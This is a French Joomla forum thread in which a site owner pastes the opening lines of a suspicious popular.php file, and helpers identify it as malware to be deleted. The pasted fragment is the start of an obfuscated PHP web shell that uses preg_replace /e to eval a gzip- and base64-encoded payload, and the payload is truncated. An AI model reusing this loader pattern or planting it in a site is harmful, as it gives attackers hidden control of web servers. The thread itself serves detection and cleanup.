popular.php

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] popular.php

    Bonjour,
    Je vous sollicite encore une fois, mon site sous joomla 3.4.7 avait un fichier sous la racine qui s'appelait popular.php de 23,3 Ko et qui commençait comme ça :
    <?php


    $auth_pass = "8a4bf282852bf4c49e17f0951f645e72";

    $color = "#df5";

    $default_action = "FilesMan";

    $default_charset = "Windows-1251";

    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x 61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65 \x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R

    Je l'ai renomé et je pense le supprimer ... Vous en pensez quoi ?

  • #2
    Re : popular.php

    C'est un fichier pirate qui n'a rien à faire dans un site Joomla!
    Il n'est hélas peut-être pas seul à polluer ton site.
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

    Commentaire


    • #3
      Re : popular.php

      Merci, je vais m'y pencher

      Commentaire


      • #4
        Re : popular.php

        Zéro doute : it's a malware.

        Supprime ce machin sans délai et donc, forcément, ton site contient d'autres bestioles; ça aussi cela ne fait aucun doute.
        Christophe (cavo789)
        Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
        Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

        Commentaire

        Annonce

        Réduire
        Aucune annonce pour le moment.

        Partenaire de l'association

        Réduire

        Hébergeur Web PlanetHoster
        Travaille ...
        X